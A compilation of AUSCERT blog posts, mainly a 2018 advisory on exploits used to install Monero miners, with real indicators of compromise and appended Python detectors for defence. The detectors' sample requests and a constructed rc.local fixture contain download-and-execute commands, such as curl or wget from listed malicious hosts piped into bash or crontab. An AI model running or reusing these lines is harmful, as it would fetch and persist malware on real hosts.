– 2009, Georgia. DoS of Twitter and Facebook in Georgia. Triggered by the first anniversary of the invasion of Georgia!
– 2014, Ukraine. DoS on Ukrainian election commission. Triggered by attempts to create chaos in support of the pro-Russian candidate.
– 2015, Germany. Compromise of German Bundestag. Triggered by an attempt to retrieve information on German and NATO leaders.
– 2015, Holland. Pull out reports on MH17 investigation.
– 2015, USA. Compromise of Democratic Party computers. Triggered by attempts to undermine elections.
– 2016, Finland. Compromise of Finnish foreign ministry computers.
– 2016, Germany. Emerging claims of malicious activity being conducted by Russian hackers to discredit incumbent chancellor, Angela Merkel.

Increasing confidence

The above sequence indicates an increasingly confident nation state, reaching further and deeper into foreign spheres to satisfy its political agenda. One common thread in all the above attacks is an attempt to highlight weaknesses in the targeted country's government and/or commercial infrastructure. Even stealthy attacks, once exposed to the media, serve to question the security posture of the victim nation.

While the above list contains all the acts attributed to Russia, other nation states, such as North Korea, have also been attributed with malicious acts against other nations. Perhaps most significant in the context of the Commonwealth Games is the "Olympic Destroyer" [2] malware that was deployed against South Korea during the Pyeongchang winter Olympics. This malware was capable of permanently damaging computer systems employed in the games.

What does this mean for us?

Possibly a two-pronged approach:

Noisy hacktivist-type attacks
– Government website defacements (e.g. foreign ministry)
– Commonwealth Games site defacement
– Denial of Service attacks against Commonwealth Games infrastructure (similar to Olympic Destroyer)

Stealthy attacks
– Advanced Persistent Threats (APTs) to obtain sensitive data from Government and commercial entities
– Harvesting Commonwealth Games visitor information (which the Gold Coast City Council admitted doing, by collecting users' Facebook accounts when they connect to the high-speed public Wi-Fi network)

How can we protect ourselves?

– Tune preventive controls to indicators of exploit traffic, DDoS traffic, and APTs.
– Have a DDoS response plan [3].
– Watch for acts of cyber-aggression against countries threatened with retaliation as a potential indicator of elevated threats against Australia.
– Don't use unprotected public Wi-Fi networks (or "protected" public Wi-Fi networks). If you absolutely must, use encrypted chat channels and mail clients for communication.
– Elevated monitoring of Industrial Control System processes and infrastructure for anomalous behaviour.
– Read security bulletins for the latest vulnerabilities affecting devices and software in your environment that might be exploited, and take the necessary measures to patch them based on a risk-based prioritisation schedule.

References

[1] https://www.nbcnews.com/storyline/hacking-in-america/timeline-ten-years-russian-cyber-attacks-other-nations-n697111
[2] http://blog.talosintelligence.com/2018/02/olympic-destroyer.html
[3] https://zeltser.com/ddos-incident-cheat-sheet/

25 Years of AUSCERT

7 Mar 2018

AUSCERT celebrates 25 years today.

There has been a lot of growth in the industry since the original SERT (Security Emergency Response Team) was formed in 1993. Three Brisbane-based universities originally formed the SERT: Queensland University of Technology, Griffith University and The University of Queensland.

The SERT was formed for several reasons. One was in response to Australia being recognised as a targeted geographical location for cyber security threats. Also, back in 1992, Australia was the origin of an increasing number of these attacks, which targeted overseas websites. Relationship building with international CERTs began at this time, with the CERT Coordination Centre in Pittsburgh and the DFN-CERT team in Germany being incredibly vital to the growth of Australia's first CERT.

In the early days an exercise book was used to log all incoming calls, including wrong numbers. Indeed, one of those original staff members, whose initials are inscribed in that book, is an AUSCERT employee today. AUSCERT began in name on the 1st of April 1994; this was made possible by a collaboration with AARNet, who at that time were quite new themselves, having only been in operation for several years. AUSCERT became a member organisation in the late nineties, and has since been funded by our members.

The AUSCERT team is driven by a passion to protect, assist and engage with the information security community. We will continue to provide first class threat intelligence, unique membership options and advice now, and in the future.

Mandatory Data Breach Notification Scheme

22 Feb 2018

How it affects you

Introduction

It's official! The Notifiable Data Breaches scheme, established by the Privacy Amendment (Notifiable Data Breaches) Act 2017, will be officially enforced from the 22nd of February 2018.

What is it?

It is a legal obligation to notify individuals whose personal information is involved in a data breach that is likely to result in serious harm.

Does my organisation need to comply? When do I need to report a data breach and how?

IF
1. your organisation is described in "Entities covered by the NDB scheme"
AND
2. your organisation collects, retains, handles and transmits 'personal information'
AND
3. your organisation has been subjected to an eligible data breach [4], and there are no applicable exceptions to notification obligations,
THEN you need to complete assessing the suspected data breach within 30 calendar days of becoming aware of the suspected breach. A suggested three-step assessment procedure contains the following stages:
a. Initiate: decide whether an assessment is necessary and identify which person or group will be responsible for completing it
b. Investigate: quickly gather relevant information about the suspected breach including, for example, what personal information is affected, who may have had access to the information and the likely impacts, and
c. Evaluate: make a decision, based on the investigation, about whether the identified breach is an eligible data breach (see Identifying eligible data breaches).

IF reasonable evidence exists to believe an eligible data breach has occurred,
THEN
1. You need to notify:
a. affected individuals
b. the Australian Information Commissioner, by submitting a Notifiable Data Breach statement – form available at https://www.oaic.gov.au/NDBform/.
2. The following information must be included in an eligible data breach statement:
a. the identity and contact details of the organisation
b. a description of the data breach
c. the kinds of information concerned, and
d. recommendations about the steps individuals should take in response to the data breach.
3. Special conditions for notification exist where the breached data is in the custody of more than one party.

An excellent resource covering this topic is available here.

Additional Resources

https://www.youtube.com/watch?v=BZXzNLlW2vA

Legal

AUSCERT has made every effort to ensure that the information contained on this web site is accurate. However, the decision to use or follow any information or advice referenced here is the responsibility of each user or organisation. The appropriateness of any information or advice for an organisation or individual system should be considered before application in conjunction with the organisation's local policies and procedures. AUSCERT takes no responsibility for the consequences of applying or following the information or advice on this web site.

AUSCERT at linux.conf.au 2018

31 Jan 2018

Hi, I'm David, one of the information security analysts here.

Intro

AUSCERT sent me to the 2018 linux.conf.au conference with a Fairy Penguin sponsorship. It was my second time attending; the previous year, I'd taken a week's leave and paid my own way, and was so enamoured that I convinced my new employer to send me along this time.

The real strength of the conference, to me, is being surrounded by people much smarter and more experienced than myself. (This is exactly how I pitched it to management.) And the atmosphere is so friendly that knowledge transfers quickly. The organisers put a strong emphasis on inclusion and diversity. One of these is the "Pac-Man rule": when standing in a circle talking, shape it like Pac-Man and leave space for someone else to join.

Speaking of speaking, the #lca2018 hashtag was pretty hectic all week. The Australia/NZ FOSS community is great to be involved with, and I've found it pays to follow interesting people using the tag. I also find it's valuable to connect with people for whom information security is part of their job, but not their core responsibility. Understanding the motivations and needs of people outside the infosec space is important to staying in the loop. Plus, they have some really cool projects.

Recordings to watch

All the talks are recorded and published free on YouTube by Next Day Video. I'm enjoying "week two" of the conference – catching up on the talks I couldn't attend! We'll also replay some talks at the office over lunch. At AUSCERT, we mix infosec with data analysis, technical communication and lightweight development. Current proposals are Understanding git – even the scary parts, What is the most common street name in Australia?, Is the 370 the worst bus route in Sydney? and the Panel on Meltdown, Spectre and the free-software community.

Talks I personally recommend are every single keynote, the Meltdown/Spectre Panel, a home Kubernetes environment, automating WordPress security recovery, Tap On to Reverse Engineering, and Linux system monitoring with the Elastic Stack. Shoutout to Alistair Chapman for his superb lightning talk on things you can do but shouldn't with Docker.

Notes from the Spectre/Meltdown Panel

The speculative execution side-channel vulnerabilities had been leaked three weeks before the conference, so a panel was organised (and jammed into the schedule). It was a fascinating session giving perspectives from several stakeholders at several levels of the stack – hardware, kernel, OS, container, SRE and more kernel. Some interesting stories about responses to the embargo and patches from different parties:
– FreeBSD weren't included in the embargo and were left scrambling to patch when it leaked.
– Small PaaS providers are stuck waiting for patches for their OS.
– Hardware vulnerabilities are very hard to resist even with containerised services … but containers will make it easier when you patch.
– Some discussion of the value of embargoes of vulnerabilities.

Give the full session a watch; it's rare to find so much diverse expertise in one room, talking semi-frankly about this.

Wrapping up

The linux.conf.au conference is a very educational week for anyone IT-adjacent, and I'd strongly recommend it. Hope to see you at #lca2019 in Christchurch!

David Lord, @dal_geek

Attackers using remote code execution vulnerabilities to install cryptocurrency miners in vulnerable hosts

5 Jan 2018

Introduction

Kicking off the new year, AUSCERT received reports of multiple attacks attempting to run exploits against vulnerable hosts in order to install and operate cryptocurrency miners on them. Similar attacks have been reported around the globe. Attacks sighted so far have targeted hosts running Linux operating systems. The miners are dropped as 64-bit ELF files; they are Monero miners, and are variants of XMRig [1]. AlienVault released a pulse addressing Monero miner installation attacks [2].

In one attack scenario, attackers exploited a remote code execution vulnerability in the WLS Security sub-component of Oracle WebLogic Server (WLS) (CVE-2017-10271) to download and install Monero miner software on the target host. WebLogic Server versions vulnerable to this attack are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This vulnerability was addressed in the Oracle Critical Patch Update (CPU) of October 2017 [3]. Two articles from nsfocusglobal and morihi-soc (translation required) provide analyses of these attacks [4,5]. AUSCERT performed its own analysis based on reports from multiple members. Indicators derived from that investigation have been included in the list of indicators at the end of this blog.

A new Python-based cryptominer botnet has also been recently exposed. It uses a JBoss vulnerability (CVE-2017-12149) to run remote code execution exploits against vulnerable Linux hosts, fetching base64-encoded Python scripts and executing them. These scripts in turn connect to remote command and control (C&C) servers to fetch additional Python scripts. Interestingly, this botnet appears to be using Pastebin resources as C&C servers [6].

Basic characteristics of an attack

1. Attackers launch a remote code execution exploit targeting one of the following vulnerabilities in the target host:
   a. WebLogic Server remote code execution vulnerability (CVE-2017-10271)
   b. JBoss remote code execution vulnerabilities (CVE-2017-7504, and CVE-2017-12149, which is used by the new Python-based crypto miner)
   c. Apache Struts Jakarta Multipart parser remote code execution vulnerability (CVE-2017-5638)
2. The exploit request carries a payload that fetches the cryptominer from a remote URL, creates a crontab entry to make it run persistently, and executes it via the local shell appropriate to the operating system (e.g. cmd.exe on Windows and /bin/bash on Linux).
3. Additional shell scripts are fetched from remote servers. These scripts:
   a. Kill competing processes that consume large CPU loads (>20%)
   b. Kill competing xmrig cryptocurrency mining processes
   c. Create crontab entries and/or rc.local entries to ensure the miner is executed at regular intervals or on system reboot
   d. Modify file permissions so the miner can be executed by users at any privilege level
   e. Generate log files
   f. Report the miner's execution progress to a remote HQ
   g. Determine the CPU type and number of CPU cores in the host, then branch to fetch an appropriate miner
4. The miner regularly reports execution progress to a remote mining pool (or HQ).

Actual miner files carry different names depending on the attack. AUSCERT has so far sighted miners as 64-bit ELF files with the following names:
   a. fs-manager
   b. sourplum
   c. kworker (a name shared with the kernel's own worker threads, so check the on-disk file rather than trusting process listings)
   d. kworker_na

Factors differentiating miners

1. Maximum CPU threshold.
2. Dependence on an external config file. Some miners require an external config file (for example, kworker.conf or config.json) to execute correctly. The config file typically contains:
   a. The username and password used to access the remote mining pool
   b. The URL of the remote mining pool
   c. The mining algorithm used (e.g. CryptoNight)
   d. The "nice" level of the mining process
3. Homing to different HQs or mining pools.

Mitigation recommendations

1. Patch systems against the vulnerabilities commonly targeted by this type of attack.
2. Set ACLs and firewall rules to block outbound and inbound access to and from known cryptocurrency mining pool IPs (unless your organisational policy allows the use of computing resources for cryptocurrency mining!).
3. Set IDS/IPS to detect requests and responses to and from the payload delivery and network activity URLs.
4. Block resolution of domains known to be C&C servers and mining pools for cryptocurrency miners (e.g. via DNS firewalls).
5. Check host file systems for dropped files (the crypto miners) and their corresponding hashes (e.g. using a host-based IDS such as OSSEC). See the Indicators section below for a list of indicators of compromise.

References

1. https://github.com/xmrig/xmrig
2. https://otx.alienvault.com/pulse/5a4e1c4993199b299f90a212/?utm_medium=InProduct&utm_source=OTX&utm_content=Email&utm_campaign=new_pulse_from_subscribed
3. http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
4. https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/
5. http://www.morihi-soc.net/?p=910
6. https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar

Indicators

Network-based indicators

Payload delivery URLs (Monero miner delivery):
   http://27.148.157.89:8899/1.exe
   http://221.229.204.177:8888
   http://27.148.157.89:8899/xmrig
   http://72.11.140.178/?info=l30
   http://72.11.140.178/files/
   http://72.11.140.178/?info=l69
   http://72.11.140.178/files/w/default
   http://27.148.157.89:8899/xmr64.exe
   http://72.11.140.178/?info=w0
   http://27.148.157.89:8899/1.sh
   http://72.11.140.178/files/w/default/auto-upgrade.exe
   http://72.11.140.178/files/w/default?info=w0
   http://www.luoxkexp.com:8520/php.exe
   http://72.11.140.178/auto-upgrade
   http://luoxkexp.com:8888/samba.exe
   http://27.148.157.89:8899/xmr86.exe
   http://27.148.157.89:8899/fuckpig.jar
   http://www.luoxkexp.com:8520/
   http://72.11.140.178/?info=w9
   http://72.11.140.178/files/w/default?info=w9
   http://luoxkexp.com:8888/xmr64.exe
   http://luoxkexp.com/xmr64.exe
   http://27.148.157.89:8899/112.exe
   http://72.11.140.178/files
   http://27.148.157.89:8899/jiba
   http://luoxkexp.com
   http://72.11.140.178/files/w/others
   http://72.11.140.178/setup-watch
   http://72.11.140.178/wls-wsat/CoordinatorPortType
   http://72.11.140.178/?info=l60
   http://72.11.140.178/files/l/default
   http://luoxkexp.com:8888/xmr86.exe
   http://luoxkexp.com:8899/xmr64.exe
   http://72.11.140.178/files/l/others
   http://luoxkexp.com:8899/1.exe
   http://letoscribe.ru/includes/libraries/files.tar.gz
   http://5.188.87.12/langs/kworker_na

Payload delivery URLs (other):
   http://letoscribe.ru/includes/libraries/getsetup.php?p=wl   Monero miner setup file delivery URL
   http://45.77.106.29/selectv2.sh   Sourplum and related scripts delivery URL
   http://45.77.106.29/sourplum   Sourplum and related scripts delivery URL
   http://45.77.106.29/lowerv2.sh   Sourplum and related scripts delivery URL
   http://45.77.106.29/rootv2.sh   Shell script delivery URL
   http://181.214.87.240/res/logo.jpg   Shell script delivery URL
   http://181.214.87.240/res/kworker.conf   Monero miner config file delivery URL

Network activity URLs:
   http://letoscribe.ru/includes/libraries/notify.php?p=wl   Monero miner reports execution progress to HQ at this URL
   http://104.223.37.150:8090   Known C&C for Python-based crypto miner
   http://pastebin.com/raw/yDnzKz72   Known C&C for Python-based crypto miner
   http://k.zsw8.cc:8080   Known C&C for Python-based crypto miner
   http://i.zsw8.cc:8080   Known C&C for Python-based crypto miner
   http://pastebin.com/raw/rWjyEGDq   Known C&C for Python-based crypto miner
   http://208.92.90.51   Known C&C for Python-based crypto miner
   http://208.92.90.51:443   Known C&C for Python-based crypto miner

Network activity domains:
   minergate.com   Known C&C address pool and mining pool domain
   minexmr.com   Known C&C address pool and mining pool domain
   letoscribe.ru   Known Monero miner HQ domain
   pool-proxy.com   Mining pool domain
   fee.xmrig.com   Domain contacted by fs-manager
   nicehash.com   Domain contacted by fs-manager
   data.rel.ro   Domain contacted by fs-manager (note: .data.rel.ro is also the name of a standard ELF section, so this string may be a static-analysis artefact rather than a real contact)
   dkuug.dk   kworker miner attempts to communicate with this domain
   i.zsw8.cc   C&C domain for Python-based crypto miner
   k.zsw8.cc   C&C domain for Python-based crypto miner

Network activity hostnames:
   pool.supportxmr.com   Known mining pool host
   pool.cortins.tk   Known mining pool host

Network activity destination IPs:
   104.25.208.15   C&C address pool and mining pool IP
   94.130.143.162   C&C address pool and mining pool IP
   72.11.140.178   C&C address pool and mining pool IP
   88.99.142.163   C&C address pool and mining pool IP
   78.46.91.134   C&C address pool and mining pool IP
   104.25.209.15   C&C address pool and mining pool IP
   136.243.102.154   C&C address pool and mining pool IP
   136.243.102.167   C&C address pool and mining pool IP
   148.251.133.246   Mining pool (HQ) IP
   104.223.37.150   C&C IP
   208.92.90.51   C&C IP

Payload delivery source IPs:
   45.77.106.29
   181.214.87.240

Host-based indicators

Artifacts dropped (SHA-256):
   7153ac617df7aa6f911e361b1f0c8188ca5c142c6aaa8faa2a59b55e0b823c1c   XMRig variant fs-manager
   9359f7e7b1dd0f4ce4a2c52fe611c981a3dd7a17f935862e3ce9acb5f2df8ced   kworker
   f4864b3793c93de50b953e9751dc22e03fa0333ae6856d8d153be9018da6d911   kworker_na
   d47d2aa3c640e1563ba294a140ab3ccd22f987d5c5794c223ca8557b68c25e0d   Python-based crypto miner
   bcf306bf3c905567ac1a5012be94fe642cac6116192cea6486730341b32b38a4
   0c5e960ca2a37cf383a7457bcc82e66d5b94164b12dfca1f21501211d9aca3c9
   b3aba7582de82a0229b4d4caf73bc50cc18eb98109a0e251447dfb47afabc597

Payload delivery (MD5):
   0dc34402be603f563bfb25e7c476a0b4
   6455ffef458df6d24dd4df37f3d6df73
   9eadc40299864089e8a0959d04b02b39
   e1df71c38cea61397e713d6e580e9051

Payload delivery (SHA-1):
   deeb65dbf4ac5d1d0db6ac4467282f62049a3620
   777af085e72a4a19b6971f24c1167989335af508
   4f41da624726daf16e1c0034e8a6a99c790be61e
   9be68990dd7b071b192b89b0e384f290cce2b2db

Payload delivery (SHA-256):
   0b2bd245ce62787101bc56b1eeda9f74e0f87b72781c8f50a1eff185a2a98391
   182812097daabfc3fe52dd485bb0a0f566ddf47f23b9d9f72c2df01a1a4faf84
   43f78c1c1b078f29fd5eb75759aa7b1459aa3f1679bbaabc1e67c362620650fb
   370109b73fa9dceea9e2b34b466d0d2560025efcc78616387d84732cbe82b6bd
   36524172afa85a131bf0075c7ff20dcbfb8a94c4e981300fb33ef56ed912678c
   348c7dd59ea1b4e88585863dd788621f1101202d32df67eb0015761d25946420
   198e090e86863fb5015e380dc159c5634cc2a598e93b20dd9695e1649bb062ad
   d47d2aa3c640e1563ba294a140ab3ccd22f987d5c5794c223ca8557b68c25e0d
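The exploit-and-fetch stage described under "Basic characteristics of an attack" is what an IDS/IPS rule (mitigation item 3) has to catch. The following is an added example, not AUSCERT's own tooling: a small Python classifier run over constructed requests of the kind a reverse proxy or WAF would log. The wls-wsat path comes from the indicators list; the JBoss endpoint paths, the Struts Content-Type pattern and the sample bodies (abbreviated with "...", not working exploits) are assumptions based on the public exploits for those CVEs.

```python
"""Flag HTTP requests that match the exploit-and-fetch pattern in the post.
Added example (not AUSCERT code). Input: a list of dicts with method, path,
headers and body, as a WAF or reverse proxy would see them."""
import re

# Endpoint paths hit by the public exploits for the CVEs listed above. The post
# itself gives only the CVE numbers and the wls-wsat path; the JBoss paths are
# assumptions taken from the public exploits.
ENDPOINT_SIGNATURES = [
    ("CVE-2017-10271 WebLogic wls-wsat", re.compile(r"^/wls-wsat/", re.I)),
    ("CVE-2017-12149 JBoss HttpInvoker", re.compile(r"^/invoker/readonly", re.I)),
    ("CVE-2017-7504 JBoss JMXInvokerServlet", re.compile(r"^/invoker/JMXInvokerServlet", re.I)),
]
# CVE-2017-5638 smuggles an OGNL expression in the Content-Type header.
STRUTS_OGNL = re.compile(r"%\{.*#_memberAccess|ognl\.OgnlContext", re.I | re.S)
# WebLogic XMLDecoder payloads spawn the shell through ProcessBuilder.
PROCESS_BUILDER = re.compile(r"java\.lang\.ProcessBuilder")
# Stage 2 from the post: fetch the miner from a URL, run it, persist via cron.
DOWNLOAD = re.compile(r"\b(?:wget|curl)\b[^\n]*?https?://", re.I)
EXECUTE = re.compile(r"\|\s*(?:ba)?sh\b|\bchmod\s+(?:\+x|[0-7]{3,4})\b|/bin/(?:ba)?sh\b|\bcmd\.exe\b", re.I)
CRON_PERSIST = re.compile(r"\bcrontab\b|/etc/cron|/var/spool/cron|rc\.local", re.I)
# Payload delivery hosts from the indicators list.
DELIVERY_HOSTS = ("27.148.157.89", "221.229.204.177", "72.11.140.178", "luoxkexp.com",
                  "letoscribe.ru", "45.77.106.29", "181.214.87.240", "5.188.87.12")


def classify_request(req):
    """Return the reasons this request matches the attack pattern (empty if none)."""
    reasons = []
    path = req.get("path", "")
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    body = req.get("body", "")
    blob = body + "\n" + "\n".join(headers.values())  # commands hide in either place
    for name, pat in ENDPOINT_SIGNATURES:
        if pat.search(path):
            reasons.append("endpoint: " + name)
    if STRUTS_OGNL.search(headers.get("content-type", "")):
        reasons.append("endpoint: CVE-2017-5638 Struts OGNL in Content-Type")
    if PROCESS_BUILDER.search(body):
        reasons.append("payload: java.lang.ProcessBuilder in request body")
    if DOWNLOAD.search(blob) and EXECUTE.search(blob):
        reasons.append("payload: download-and-execute chain")
    if CRON_PERSIST.search(blob):
        reasons.append("payload: crontab/rc.local persistence")
    for host in DELIVERY_HOSTS:
        if host in blob:
            reasons.append("ioc: known payload delivery host " + host)
    return reasons


def scan(requests):
    """Return [(index, reasons)] for every request that matched something."""
    hits = []
    for i, req in enumerate(requests):
        reasons = classify_request(req)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample traffic (abbreviated with "..."; not working exploits).
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/wls-wsat/CoordinatorPortType",
     "headers": {"Content-Type": "text/xml"},
     "body": ('<java class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder">...'
              '<string>/bin/bash</string><string>-c</string>'
              '<string>wget http://72.11.140.178/setup-watch -O /tmp/w; chmod +x /tmp/w; /tmp/w; '
              '(crontab -l; echo "*/10 * * * * /tmp/w") | crontab -</string>...</void></java>')},
    {"method": "POST", "path": "/struts2-showcase/index.action",
     "headers": {"Content-Type": "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
                                 ".(#_memberAccess=#dm).(#cmd='curl http://45.77.106.29/rootv2.sh | bash')...}"},
     "body": ""},
    {"method": "GET", "path": "/index.html", "headers": {"User-Agent": "Mozilla/5.0"}, "body": ""},
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_REQUESTS):
        print(index, SAMPLE_REQUESTS[index]["path"], *reasons, sep="\n  ")
```

The endpoint match alone is weak (legitimate clients hit /wls-wsat/ too); the download-and-execute chain and a known delivery host in the same request are what justify blocking, so treat the reason list as a score rather than any single hit as a verdict.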
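Mitigation item 5 (check host file systems for dropped files and their hashes) as an added Python example, not AUSCERT's tooling. It sweeps directories for the file names and SHA-256 hashes listed in the host-based indicators, confirms that a name hit is a 64-bit ELF as described above, and greps cron/rc.local-style files for the delivery and C&C hosts from the network indicators. The directory layout it builds for the demonstration is constructed; on a real host point it at /tmp, /var/tmp, /dev/shm, /etc/rc.local and the cron spool.

```python
"""Host sweep for the dropped-file and persistence indicators in the post.
Added example (not AUSCERT code); the demo host layout is constructed."""
import hashlib
import os
import re
import tempfile

# SHA-256 hashes and file names from the host-based indicators above.
IOC_SHA256 = {
    "7153ac617df7aa6f911e361b1f0c8188ca5c142c6aaa8faa2a59b55e0b823c1c",  # fs-manager
    "9359f7e7b1dd0f4ce4a2c52fe611c981a3dd7a17f935862e3ce9acb5f2df8ced",  # kworker
    "f4864b3793c93de50b953e9751dc22e03fa0333ae6856d8d153be9018da6d911",  # kworker_na
    "d47d2aa3c640e1563ba294a140ab3ccd22f987d5c5794c223ca8557b68c25e0d",  # python-based miner
}
IOC_NAMES = {"fs-manager", "sourplum", "kworker", "kworker_na", "kworker.conf"}
# Delivery and C&C hosts from the network indicators; a cron or rc.local entry
# that references one of these is the persistence mechanism the post describes.
IOC_NET = re.compile("|".join(re.escape(h) for h in (
    "27.148.157.89", "221.229.204.177", "72.11.140.178", "luoxkexp.com", "letoscribe.ru",
    "45.77.106.29", "181.214.87.240", "5.188.87.12", "104.223.37.150", "208.92.90.51",
    "zsw8.cc", "minergate.com", "minexmr.com", "pool-proxy.com", "supportxmr.com", "pool.cortins.tk")))


def sha256_of(path, chunk=1 << 16):
    """Stream the file so large binaries are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def is_elf64(path):
    """The sighted miners are 64-bit ELF: magic 7f 'E' 'L' 'F', then EI_CLASS == 2."""
    with open(path, "rb") as f:
        head = f.read(5)
    return len(head) == 5 and head[:4] == b"\x7fELF" and head[4] == 2


def sweep_files(roots, bad_hashes=IOC_SHA256, bad_names=IOC_NAMES):
    """Walk the given directories; report files whose name or hash matches."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                if os.path.islink(path) or not os.path.isfile(path):
                    continue  # skip symlinks and special files
                if name in bad_names:
                    tag = "known miner name" + (" (ELF64)" if is_elf64(path) else "")
                    findings.append((tag, path))
                if sha256_of(path) in bad_hashes:
                    findings.append(("known miner hash", path))
    return findings


def sweep_persistence(paths):
    """Grep cron/rc.local style files for lines that pull from the IoC hosts."""
    findings = []
    for path in paths:
        if not os.path.isfile(path):
            continue
        with open(path, "r", errors="replace") as f:
            for lineno, line in enumerate(f, 1):
                if IOC_NET.search(line):
                    findings.append(("persistence entry", "%s:%d" % (path, lineno), line.strip()))
    return findings


def build_constructed_host(tmpdir):
    """Constructed layout for the demonstration: a fake ELF64 named like the
    miner, and an rc.local that fetches a script from a delivery host."""
    miner = os.path.join(tmpdir, "tmp", "kworker_na")
    os.makedirs(os.path.dirname(miner), exist_ok=True)
    with open(miner, "wb") as f:
        f.write(b"\x7fELF\x02\x01\x01" + b"\x00" * 57 + b"constructed, not a real miner")
    rc = os.path.join(tmpdir, "rc.local")
    with open(rc, "w") as f:
        f.write("#!/bin/sh\ncurl -fsSL http://45.77.106.29/rootv2.sh | sh\nexit 0\n")
    return miner, rc


def demo():
    """Build the constructed host under a temp dir and run both sweeps on it."""
    d = tempfile.mkdtemp(prefix="miner-sweep-")
    miner, rc = build_constructed_host(d)
    return {"dir": d, "miner": miner, "rc": rc,
            "files": sweep_files([d]),
            "persistence": sweep_persistence([rc, os.path.join(d, "missing")])}


if __name__ == "__main__":
    result = demo()
    for finding in result["files"] + result["persistence"]:
        print(*finding)
```

Hash matching only catches the exact samples listed; the name and ELF64 checks and the persistence grep are what pick up recompiled variants, which is why the sweep reports all three separately.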


Breach compilation notifications

21 Dec 2017

On Tuesday 19th December, AUSCERT notified a large number of members whose credentials had been found online. This is a regular service AUSCERT provides, but in this case it is a special event based on a large credential compilation. It contains 1.4 billion credentials. Original source.

FAQ

How do I open this file?
Suppose the file you've received is named me@mydomain.com.zip.asc. This is an encrypted zip file. You will need PGP software to decrypt the file, e.g. GPG.
GPG4Win GUI: open the file in Kleopatra and enter the decryption passphrase. If Kleopatra reports "error retrieving audit log: decryption failed", instead open a command prompt and follow the instructions below.
GPG command line: run gpg me@mydomain.com.zip.asc and enter the decryption passphrase. This will create me@mydomain.com.zip (note: no ".asc"). Then unzip the file. It contains one or more text files with the credentials we've found.

Where do I get the decryption passphrase?
Access AUSCERT: Symmetric key decryption details and log in with your member account.

We can't log in to the member portal.
If you know your AUSCERT privileged contact/s in your organisation, please contact them for access. Otherwise, please contact auscert@auscert.org.au to begin regaining access. If you have two-factor authentication set up, recall that this is through a one-time password app and not an SMS.

Why does Windows say they're COM or audio files?
Individual files are named by the domain they correspond to. Some files end with ".com", which Windows interprets as a command file, or ".au", which Windows interprets as an audio file. We'll send files with the ".txt" extension in future. Please open all files in a text editor, such as WordPad or Notepad++.

Where did you get this data?
AUSCERT found these credentials in a large collection online, which aggregates other data breaches. It is likely that your users' credentials were stolen in other breaches such as LinkedIn (for instance, Have I Been Pwned lists famous breaches). Original source.

Have we been breached?
It's hard to say. The majority of the data will have come from attacks on other companies' databases in the past. Some may be from phishing attacks directly against your users. With a data set this large, individual small attacks can be compiled into what looks like one more substantial attack. It is unlikely, but possible, that your organisation's database is the source of these credentials. If any of these credentials were reused on internal company systems, and are still active, then there is the potential for them to be abused.

What do we do now?
AUSCERT recommends ensuring these credentials are no longer valid within your organisation. Consider contacting users to advise they should change their password anywhere it's still in use.
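The decrypt, unzip and rename steps from the FAQ above as POSIX shell functions. This is an added example, not an AUSCERT script; it assumes gpg and unzip are installed and that the file names follow the me@mydomain.com.zip.asc convention the FAQ describes. The rename step handles the ".com"/".au" problem by giving every extracted file a ".txt" suffix.

```sh
# Added example (not from the AUSCERT post): decrypt / unzip / rename helpers
# for the notification files. Assumes gpg and unzip are on PATH.

# Decrypt the symmetrically encrypted notification. gpg prompts for the
# passphrase from the AUSCERT member portal and writes me@mydomain.com.zip.
decrypt_notification() {
    asc=$1
    case "$asc" in
        *.asc) ;;
        *) echo "expected a .asc file, got: $asc" >&2; return 1 ;;
    esac
    gpg --output "${asc%.asc}" --decrypt "$asc"
}

# Unpack the zip into its own directory so the per-domain files do not land
# next to unrelated files. Prints the directory it used.
extract_notification() {
    zip=$1
    outdir=${2:-${zip%.zip}}
    mkdir -p "$outdir"
    unzip -q -o "$zip" -d "$outdir"
    echo "$outdir"
}

# The files are named after domains (example.com, example.com.au), which
# Windows mistakes for COM or audio files. Give every non-.txt file a .txt
# suffix so it opens in a text editor. Safe to re-run on the same directory.
rename_to_txt() {
    dir=$1
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        case "$f" in *.txt) continue ;; esac
        mv -- "$f" "$f.txt"
    done
}

# Usage:
#   decrypt_notification me@mydomain.com.zip.asc
#   rename_to_txt "$(extract_notification me@mydomain.com.zip)"
```

Appending ".txt" rather than replacing the extension keeps the domain name intact in the file name, which is the only record of which domain each credential list belongs to.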


APCERT 2017 AGM and Conference: A Window into the CERT community

21 Nov 2017

Introduction

This year's APCERT Annual General Meeting and conference has just concluded, being hosted by CERT-In in New Delhi, India. Each year AUSCERT sends a representative to the APCERT conference to collaborate and cooperate with the rest of the APCERT community. This year, I was lucky enough to be selected to attend.

APCERT is a community of CERT and CSIRT organisations located in the Asia-Pacific area. Originally formed in 2003, its membership has now grown to 30 organisations representing 21 economies, as well as a number of supporting partner organisations. APCERT's goals include information sharing and cooperation between its members and the public.

Arriving in New Delhi

This was my first visit to India, and although I had some knowledge of Indian culture and life, I was amazed to experience it first-hand. I arrived one day before the conference began, and spent the day shopping and taking in the local sights. The bustling streets, chaotic traffic, and the sheer scale of the country are a sight to see, and offer a sharp contrast to the quiet suburban life I am used to back in Brisbane. Delhi itself is a massive city, with a population that rivals that of all of Australia.

The conference itself was hosted at the Ashok hotel, in Chanakyapuri, New Delhi. This five-star hotel is located in the heart of a diplomatic and government district, close to many foreign embassies, and as a result is very accommodating to foreign guests.

The APCERT Community

